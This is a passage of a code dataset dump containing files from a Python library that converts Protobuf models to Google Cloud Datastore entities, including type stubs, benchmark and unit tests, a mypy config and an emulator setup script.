'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n install_requires=install_reqs,\n dependency_links=dep_links,\n zip_safe=False,\n include_package_data=True,\n packages=find_packages(exclude=['setuptools', 'tests']),\n package_data={\n 'protobuf_cloud_datastore_translator': ['py.typed']\n }\n)\n" }, { "alpha_fraction": 0.6240977048873901, "alphanum_fraction": 0.636868417263031, "avg_line_length": 53.029998779296875, "blob_id": "b7c222b4581f8cd66b8fc3eb642a6e96dcf079eb", "content_id": "8fb71fa48336e036d1071bab6960a224a8fb5769", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 5403, "license_type": "permissive", "max_line_length": 309, "num_lines": 100, "path": "/tests/generated/models/example_with_options_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom google.protobuf.descriptor import (\n Descriptor as google___protobuf___descriptor___Descriptor,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\nfrom typing import (\n Optional as typing___Optional,\n Text as typing___Text,\n)\n\nfrom typing_extensions import (\n Literal as typing_extensions___Literal,\n)\n\n\nclass ExampleDBModelWithOptions1(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key_one = ... # type: typing___Text\n string_key_two = ... # type: typing___Text\n string_key_three = ... # type: typing___Text\n string_key_four = ... # type: typing___Text\n int32_field_one = ... # type: int\n int32_field_two = ... # type: int\n\n def __init__(self,\n *,\n string_key_one : typing___Optional[typing___Text] = None,\n string_key_two : typing___Optional[typing___Text] = None,\n string_key_three : typing___Optional[typing___Text] = None,\n string_key_four : typing___Optional[typing___Text] = None,\n int32_field_one : typing___Optional[int] = None,\n int32_field_two : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModelWithOptions1: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",u\"int32_field_two\",u\"string_key_four\",u\"string_key_one\",u\"string_key_three\",u\"string_key_two\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",b\"int32_field_one\",u\"int32_field_two\",b\"int32_field_two\",u\"string_key_four\",b\"string_key_four\",u\"string_key_one\",b\"string_key_one\",u\"string_key_three\",b\"string_key_three\",u\"string_key_two\",b\"string_key_two\"]) -> None: ...\n\nclass ExampleDBModelWithOptions2(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key_one = ... # type: typing___Text\n string_key_two = ... # type: typing___Text\n string_key_three = ... # type: typing___Text\n string_key_four = ... # type: typing___Text\n int32_field_one = ... # type: int\n int32_field_two = ... 
# type: int\n\n def __init__(self,\n *,\n string_key_one : typing___Optional[typing___Text] = None,\n string_key_two : typing___Optional[typing___Text] = None,\n string_key_three : typing___Optional[typing___Text] = None,\n string_key_four : typing___Optional[typing___Text] = None,\n int32_field_one : typing___Optional[int] = None,\n int32_field_two : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModelWithOptions2: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",u\"int32_field_two\",u\"string_key_four\",u\"string_key_one\",u\"string_key_three\",u\"string_key_two\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",b\"int32_field_one\",u\"int32_field_two\",b\"int32_field_two\",u\"string_key_four\",b\"string_key_four\",u\"string_key_one\",b\"string_key_one\",u\"string_key_three\",b\"string_key_three\",u\"string_key_two\",b\"string_key_two\"]) -> None: ...\n\nclass ExampleDBModelWithOptions3(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key_one = ... # type: typing___Text\n string_key_two = ... # type: typing___Text\n string_key_three = ... # type: typing___Text\n string_key_four = ... # type: typing___Text\n int32_field_one = ... # type: int\n int32_field_two = ... # type: int\n\n def __init__(self,\n *,\n string_key_one : typing___Optional[typing___Text] = None,\n string_key_two : typing___Optional[typing___Text] = None,\n string_key_three : typing___Optional[typing___Text] = None,\n string_key_four : typing___Optional[typing___Text] = None,\n int32_field_one : typing___Optional[int] = None,\n int32_field_two : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModelWithOptions3: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",u\"int32_field_two\",u\"string_key_four\",u\"string_key_one\",u\"string_key_three\",u\"string_key_two\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",b\"int32_field_one\",u\"int32_field_two\",b\"int32_field_two\",u\"string_key_four\",b\"string_key_four\",u\"string_key_one\",b\"string_key_one\",u\"string_key_three\",b\"string_key_three\",u\"string_key_two\",b\"string_key_two\"]) -> None: ...\n" }, { "alpha_fraction": 0.7520259022712708, "alphanum_fraction": 0.7552674412727356, "avg_line_length": 19.566667556762695, "blob_id": "648560ba64f29752a9001f05f4f16a1b91b86cd3", "content_id": "a33e606eab5c673d59123fd519935a2e2d00147a", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 617, "license_type": "permissive", "max_line_length": 77, "num_lines": 30, "path": "/lint-configs/mypy.ini", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "[mypy]\npython_version = 2.7\nplatform = linux\nshow_error_context = True\nshow_column_numbers = True\n\n# List of ignore files for packages 
and libraries which don't have type hints\n[mypy-google.type]\nignore_missing_imports = True\n\n[mypy-google.cloud.*]\nignore_missing_imports = True\n\n[mypy-google.protobuf.pyext.*]\nignore_missing_imports = True\n\n[mypy-google.api_core]\nignore_missing_imports = True\n\n[mypy-grpc.*]\nignore_missing_imports = True\n\n# Generated protobuf files\n[mypy-tests.mocks.*]\nignore_missing_imports = True\nignore_errors = True\n\n[mypy-tests.generated.*]\nignore_missing_imports = True\nignore_errors = True\n" }, { "alpha_fraction": 0.723787784576416, "alphanum_fraction": 0.739020049571991, "avg_line_length": 31.55371856689453, "blob_id": "c8cdd386665e42a0bff82b37017bc72fc337bc7b", "content_id": "35946954738dc4d9d54be128e7cd1c277d1fb8a9", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3939, "license_type": "permissive", "max_line_length": 96, "num_lines": 121, "path": "/tests/test_benchmarks.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport pytest\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nsys.path.append(os.path.join(BASE_DIR, '../'))\nsys.path.append(os.path.join(BASE_DIR, '../tests/generated/'))\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\n\nfrom tests.generated import example_pb2\nfrom tests.mocks import EXAMPLE_PB_POPULATED\nfrom tests.mocks import EXAMPLE_PB_DEFAULT_VALUES\nfrom tests.mocks import EXAMPLE_PB_WITH_OPTIONS_1\n\n\ncomplex_example_pb = EXAMPLE_PB_POPULATED\ncomplex_entity_pb = model_pb_to_entity_pb(model_pb=complex_example_pb)\n\nsimple_example_pb = EXAMPLE_PB_DEFAULT_VALUES\nsimple_entity_pb = model_pb_to_entity_pb(model_pb=simple_example_pb)\n\n\ndef measure_model_pb_to_entity_pb_complex_model():\n return model_pb_to_entity_pb(model_pb=complex_example_pb)\n\n\ndef measure_entity_pb_to_model_pb_complex_model():\n return entity_pb_to_model_pb(example_pb2.ExampleDBModel, complex_entity_pb)\n\n\ndef measure_model_pb_to_entity_pb_simple_model():\n return model_pb_to_entity_pb(model_pb=simple_example_pb)\n\n\ndef measure_entity_pb_to_model_pb_simple_model():\n return entity_pb_to_model_pb(example_pb2.ExampleDBModel, simple_entity_pb)\n\n\ndef measure_model_pb_to_entity_pb_with_exclude_field_from_index_simple_model():\n return model_pb_to_entity_pb(model_pb=EXAMPLE_PB_WITH_OPTIONS_1)\n\n\n@pytest.mark.benchmark(\n group='model_pb_to_entity_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_model_pb_to_entity_pb_complex_model(benchmark):\n # benchmark something\n result = benchmark(measure_model_pb_to_entity_pb_complex_model)\n assert bool(result)\n assert result.properties['int32_key'].integer_value == 
100\n\n\n@pytest.mark.benchmark(\n group='model_pb_to_entity_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_model_pb_to_entity_pb_simple_model(benchmark):\n # benchmark something\n result = benchmark(measure_model_pb_to_entity_pb_simple_model)\n assert bool(result)\n assert result.properties['int32_key'].integer_value == 0\n\n\n@pytest.mark.benchmark(\n group='model_pb_to_entity_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_model_pb_to_entity_pb_with_exclude_field_from_index_simple_model(benchmark):\n # benchmark something\n result = benchmark(measure_model_pb_to_entity_pb_with_exclude_field_from_index_simple_model)\n assert bool(result)\n assert result.properties['int32_field_one'].integer_value == 100000000\n assert result.properties['int32_field_one'].exclude_from_indexes is False\n assert result.properties['int32_field_two'].integer_value == 200000000\n assert result.properties['int32_field_two'].exclude_from_indexes is True\n\n\n@pytest.mark.benchmark(\n group='entity_pb_to_model_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_entity_pb_to_model_pb_complex_entity(benchmark):\n result = benchmark(measure_entity_pb_to_model_pb_complex_model)\n assert bool(result)\n assert result.int32_key == 100\n\n\n@pytest.mark.benchmark(\n group='entity_pb_to_model_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_entity_pb_to_model_pb_simple_entity(benchmark):\n result = benchmark(measure_entity_pb_to_model_pb_simple_model)\n assert bool(result)\n assert result.int32_key == 0\n" }, { "alpha_fraction": 0.7843137383460999, "alphanum_fraction": 0.843137264251709, "avg_line_length": 9.199999809265137, "blob_id": "3a1be125e01841a810556fb7ac6e86183a8576bf", "content_id": "da7fe9990f5acf170ce2fb486b0b1b9e731d5f64", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 102, "license_type": "permissive", "max_line_length": 16, "num_lines": 10, "path": "/requirements-test.txt", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "pylint\nflake8\nst2flake8==0.1.0\ncoverage\ncodecov\nrequests\npytest\npytest-coverage\npytest-benchmark\nmock\n" }, { "alpha_fraction": 0.7219973206520081, "alphanum_fraction": 0.741565465927124, "avg_line_length": 37, "blob_id": "a68e5fdefcecb72e9a0a61f45551199450193641", "content_id": "a77bf52b704ac13165c8a6b9ee477382080b730c", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1482, "license_type": "permissive", "max_line_length": 128, "num_lines": 39, "path": "/scripts/run-datastore-emulator.sh", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Script which installs and starts Google Cloud Datastore Emulator\n\n# Install Cloud SDK\nexport 
CLOUD_SDK_REPO=\"cloud-sdk-$(lsb_release -c -s)\"\necho \"deb http://packages.cloud.google.com/apt $CLOUD_SDK_REPO main\" | sudo tee -a /etc/apt/sources.list.d/google-cloud-sdk.list\ncurl https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key add -\nsudo apt-get update && sudo apt-get install google-cloud-sdk google-cloud-sdk-datastore-emulator\n\ngcloud beta emulators datastore start --host-port=127.0.0.1:8081 --no-store-on-disk &> /tmp/emulator.log &\nEMULATOR_PID=$!\n\n# Give process some time to start up\nsleep 5\n\nif ps -p ${EMULATOR_PID} > /dev/null; then\n echo \"Datastore emulator successfully started\"\n tail -30 /tmp/emulator.log\n exit 0\nelse\n echo \"Failed to start Datastore emulator\"\n tail -30 /tmp/emulator.log\n exit 1\nfi\n" }, { "alpha_fraction": 0.6266375780105591, "alphanum_fraction": 0.636826753616333, "avg_line_length": 48.36526870727539, "blob_id": "be58a9e057cde469ddf5cb4dafeb98d642d025e3", "content_id": "f255b84618c73d6baa4bf8f12532f6dc1ec342d2", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8244, "license_type": "permissive", "max_line_length": 487, "num_lines": 167, "path": "/tests/generated/compat/example_compat_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom google.protobuf.descriptor import (\n Descriptor as google___protobuf___descriptor___Descriptor,\n EnumDescriptor as google___protobuf___descriptor___EnumDescriptor,\n)\n\nfrom google.protobuf.internal.containers import (\n RepeatedScalarFieldContainer as google___protobuf___internal___containers___RepeatedScalarFieldContainer,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\nfrom google.protobuf.struct_pb2 import (\n Struct as google___protobuf___struct_pb2___Struct,\n)\n\nfrom google.protobuf.timestamp_pb2 import (\n Timestamp as google___protobuf___timestamp_pb2___Timestamp,\n)\n\nfrom typing import (\n Iterable as typing___Iterable,\n List as typing___List,\n Mapping as typing___Mapping,\n MutableMapping as typing___MutableMapping,\n Optional as typing___Optional,\n Text as typing___Text,\n Tuple as typing___Tuple,\n cast as typing___cast,\n)\n\nfrom typing_extensions import (\n Literal as typing_extensions___Literal,\n)\n\n\nclass ExampleCompatEnumModel(int):\n DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...\n @classmethod\n def Name(cls, number: int) -> str: ...\n @classmethod\n def Value(cls, name: str) -> ExampleCompatEnumModel: ...\n @classmethod\n def keys(cls) -> typing___List[str]: ...\n @classmethod\n def values(cls) -> typing___List[ExampleCompatEnumModel]: ...\n @classmethod\n def items(cls) -> typing___List[typing___Tuple[str, ExampleCompatEnumModel]]: ...\n ENUM10 = typing___cast(ExampleCompatEnumModel, 0)\n ENUM11 = typing___cast(ExampleCompatEnumModel, 1)\n ENUM12 = typing___cast(ExampleCompatEnumModel, 2)\nENUM10 = typing___cast(ExampleCompatEnumModel, 0)\nENUM11 = typing___cast(ExampleCompatEnumModel, 1)\nENUM12 = typing___cast(ExampleCompatEnumModel, 2)\n\nclass ExampleCompatNestedModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key = ... # type: typing___Text\n int32_key = ... # type: int\n enum_key = ... 
# type: ExampleCompatEnumModel\n\n def __init__(self,\n *,\n string_key : typing___Optional[typing___Text] = None,\n int32_key : typing___Optional[int] = None,\n enum_key : typing___Optional[ExampleCompatEnumModel] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleCompatNestedModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"enum_key\",u\"int32_key\",u\"string_key\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"enum_key\",b\"enum_key\",u\"int32_key\",b\"int32_key\",u\"string_key\",b\"string_key\"]) -> None: ...\n\nclass ExampleCompatDBModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n class MapStringStringEntry(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n value = ... # type: typing___Text\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n value : typing___Optional[typing___Text] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleCompatDBModel.MapStringStringEntry: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",u\"value\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",b\"key\",u\"value\",b\"value\"]) -> None: ...\n\n class MapStringInt32Entry(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n value = ... # type: int\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n value : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleCompatDBModel.MapStringInt32Entry: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",u\"value\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",b\"key\",u\"value\",b\"value\"]) -> None: ...\n\n int32_key = ... # type: int\n string_key = ... # type: typing___Text\n bool_key = ... # type: bool\n bytes_key = ... # type: bytes\n double_key = ... # type: float\n int64_key = ... # type: int\n string_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]\n int32_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[int]\n enum_key = ... 
# type: ExampleCompatEnumModel\n\n @property\n def map_string_string(self) -> typing___MutableMapping[typing___Text, typing___Text]: ...\n\n @property\n def map_string_int32(self) -> typing___MutableMapping[typing___Text, int]: ...\n\n @property\n def timestamp_key(self) -> google___protobuf___timestamp_pb2___Timestamp: ...\n\n @property\n def struct_key(self) -> google___protobuf___struct_pb2___Struct: ...\n\n def __init__(self,\n *,\n int32_key : typing___Optional[int] = None,\n string_key : typing___Optional[typing___Text] = None,\n bool_key : typing___Optional[bool] = None,\n bytes_key : typing___Optional[bytes] = None,\n double_key : typing___Optional[float] = None,\n int64_key : typing___Optional[int] = None,\n map_string_string : typing___Optional[typing___Mapping[typing___Text, typing___Text]] = None,\n map_string_int32 : typing___Optional[typing___Mapping[typing___Text, int]] = None,\n string_array_key : typing___Optional[typing___Iterable[typing___Text]] = None,\n int32_array_key : typing___Optional[typing___Iterable[int]] = None,\n enum_key : typing___Optional[ExampleCompatEnumModel] = None,\n timestamp_key : typing___Optional[google___protobuf___timestamp_pb2___Timestamp] = None,\n struct_key : typing___Optional[google___protobuf___struct_pb2___Struct] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleCompatDBModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def HasField(self, field_name: typing_extensions___Literal[u\"struct_key\",u\"timestamp_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"bool_key\",u\"bytes_key\",u\"double_key\",u\"enum_key\",u\"int32_array_key\",u\"int32_key\",u\"int64_key\",u\"map_string_int32\",u\"map_string_string\",u\"string_array_key\",u\"string_key\",u\"struct_key\",u\"timestamp_key\"]) -> None: ...\n else:\n def HasField(self, field_name: typing_extensions___Literal[u\"struct_key\",b\"struct_key\",u\"timestamp_key\",b\"timestamp_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"bool_key\",b\"bool_key\",u\"bytes_key\",b\"bytes_key\",u\"double_key\",b\"double_key\",u\"enum_key\",b\"enum_key\",u\"int32_array_key\",b\"int32_array_key\",u\"int32_key\",b\"int32_key\",u\"int64_key\",b\"int64_key\",u\"map_string_int32\",b\"map_string_int32\",u\"map_string_string\",b\"map_string_string\",u\"string_array_key\",b\"string_array_key\",u\"string_key\",b\"string_key\",u\"struct_key\",b\"struct_key\",u\"timestamp_key\",b\"timestamp_key\"]) -> None: ...\n" }, { "alpha_fraction": 0.6330932378768921, "alphanum_fraction": 0.6532334685325623, "avg_line_length": 50.20195007324219, "blob_id": "2fdb63fdd3afee7d82f00b023ca6f77e309570b4", "content_id": "754c157b6bedad0510b3025d5c53fcd10469c873", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52485, "license_type": "permissive", "max_line_length": 100, "num_lines": 1025, "path": "/tests/unit/test_translator.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of 
the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# pylint: disable=all\n\nimport sys\nimport copy\nimport unittest\n\nimport requests\nfrom google.cloud import datastore\nfrom google.cloud.datastore_v1.proto import entity_pb2\nfrom google.protobuf import struct_pb2\nfrom google.type import latlng_pb2\n\nfrom tests.generated import example_pb2\nfrom tests.generated import example2_pb2\nfrom tests.generated.models import example3_pb2\n\nfrom tests.mocks import EmulatorCreds\nfrom tests.mocks import EXAMPLE_DICT_POPULATED\nfrom tests.mocks import EXAMPLE_DICT_DEFAULT_VALUES\nfrom tests.mocks import EXAMPLE_PB_POPULATED\nfrom tests.mocks import EXAMPLE_PB_DEFAULT_VALUES\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import model_pb_with_key_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\n\n__all__ = [\n 'ModelPbToEntityPbTranslatorTestCase'\n]\n\n\nclass ModelPbToEntityPbTranslatorTestCase(unittest.TestCase):\n maxDiff = None\n\n def setUp(self):\n super(ModelPbToEntityPbTranslatorTestCase, self).setUp()\n\n modules_to_remove = [\n 'tests.generated.options_pb2',\n 'tests.generated.models.options_pb2',\n 'tests.generated.example_with_options_pb2',\n 'tests.generated.models.example_with_options_pb2',\n ]\n\n for module_name in modules_to_remove:\n if module_name in sys.modules:\n del sys.modules[module_name]\n\n def test_translate_fully_populated_model_roundtrip(self):\n # type: () -> None\n # Create an instance of ExampleDBModel Protobuf message\n example_pb = EXAMPLE_PB_POPULATED\n\n # Create example Entity protobuf object via google-cloud-datastore library with the\n # matching values\n # NOTE: We cast any number inside the dictionary to double to work around the bug in\n # \"entity_to_protobuf\" not handling numbers inside structs correctly\n example_data = copy.deepcopy(EXAMPLE_DICT_POPULATED)\n\n example_data['struct_array_key'] = self._int_to_double(example_data['struct_array_key'])\n example_data['struct_key'] = self._int_to_double(example_data['struct_key'])\n\n entity = datastore.Entity()\n entity.update(example_data)\n\n # Verify that the both Protobuf objects are the same (translated one and the datastore\n # native one)\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n entity_roundtrip = datastore.helpers.entity_from_protobuf(entity_pb_native)\n\n # Assert that end result after round trip is the same\n self.assertEqual(entity, entity_roundtrip)\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n self.assertEqual(repr(entity_pb_native), repr(entity_pb_translated))\n self.assertEqual(entity_pb_native, entity_pb_translated)\n self.assertEqual(sorted(entity_pb_native.SerializePartialToString()),\n sorted(entity_pb_translated.SerializePartialToString()))\n\n # Try converting it back to the original entity and verify it matches the input\n example_pb_converted = entity_pb_to_model_pb(example_pb2.ExampleDBModel, entity_pb_native)\n self.assertEqual(example_pb_converted, example_pb)\n self.assertEqual(sorted(example_pb_converted.SerializePartialToString()),\n sorted(example_pb.SerializePartialToString()))\n\n def 
test_struct_field_type_number_values(self):\n # NOTE: Keep in mind that struct only supports double number types and not integers\n example_pb = EXAMPLE_PB_POPULATED\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n # Verify that all the number values either top level, or nested or inside a list are\n # correctly serialized to a double value\n # Top level attribute\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key2'].double_value, 2.0)\n\n # Array attribute\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key3'].array_value.values[0].double_value,\n 1.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key3'].array_value.values[1].double_value,\n 2.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key3'].array_value.values[2].double_value,\n 3.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key3'].array_value.values[3].double_value,\n 4.44)\n\n # Nested struct attribute\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_2'].double_value,\n 30.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_3'].array_value\n .values[3].double_value,\n 7.0)\n\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_3'].array_value\n .values[4].entity_value.properties['g'].array_value.values[0].double_value,\n 1.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_3'].array_value\n .values[4].entity_value.properties['g'].array_value.values[1].double_value,\n 2.0)\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_3'].array_value\n .values[4].entity_value.properties['g'].array_value.values[2].double_value,\n 33.33)\n\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key5'].entity_value.properties['dict_key_5'].double_value,\n 55.55)\n\n # Top level attribute\n self.assertEqual(entity_pb_translated.properties['struct_key'].entity_value\n .properties['key11'].double_value, 11.123)\n\n # Test the round trip conversion\n example_pb_converted = entity_pb_to_model_pb(example_pb2.ExampleDBModel,\n entity_pb_translated)\n\n self.assertEqual(example_pb_converted.struct_key['key2'], 2.0)\n self.assertEqual(example_pb_converted.struct_key['key3'][0], 1)\n self.assertEqual(example_pb_converted.struct_key['key3'][1], 2)\n self.assertEqual(example_pb_converted.struct_key['key3'][2], 3)\n self.assertEqual(example_pb_converted.struct_key['key3'][3], 4.44)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_2'], 30)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_3'][3], 7)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_3'][4]['g'][0], 1)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_3'][4]['g'][1], 2)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_3'][4]['g'][2], 33.33)\n self.assertEqual(example_pb_converted.struct_key['key5']['dict_key_5'], 55.55)\n self.assertEqual(example_pb_converted.struct_key['key11'], 11.123)\n\n def 
test_translate_values_not_set_default_values_used(self):\n # type: () -> None\n # NOTE: proto3 syntax doesn't support HasField() anymore so there is now way for us to\n # determine if a value is set / provided. We just use the default values.\n # See https://github.com/googleapis/google-cloud-python/issues/1402\n # Verify that the default values are correctly serialized when explicitly provided and\n # when not set\n entity = datastore.Entity()\n entity.update()\n\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n entity_roundtrip = datastore.helpers.entity_from_protobuf(entity_pb_native)\n\n # Assert that end result after round trip is the same\n self.assertEqual(entity, entity_roundtrip)\n\n # Create new instance which explicitly provides values for all the fields which are the\n # same as the default values\n example_pb = EXAMPLE_PB_DEFAULT_VALUES\n\n entity_pb_translated = model_pb_to_entity_pb(model_pb=example_pb)\n\n entity = datastore.Entity()\n entity.update(EXAMPLE_DICT_DEFAULT_VALUES)\n\n entity_pb_native = datastore.helpers.entity_to_protobuf(entity)\n\n self.assertEqual(repr(entity_pb_native), repr(entity_pb_translated))\n self.assertEqual(entity_pb_native, entity_pb_translated)\n 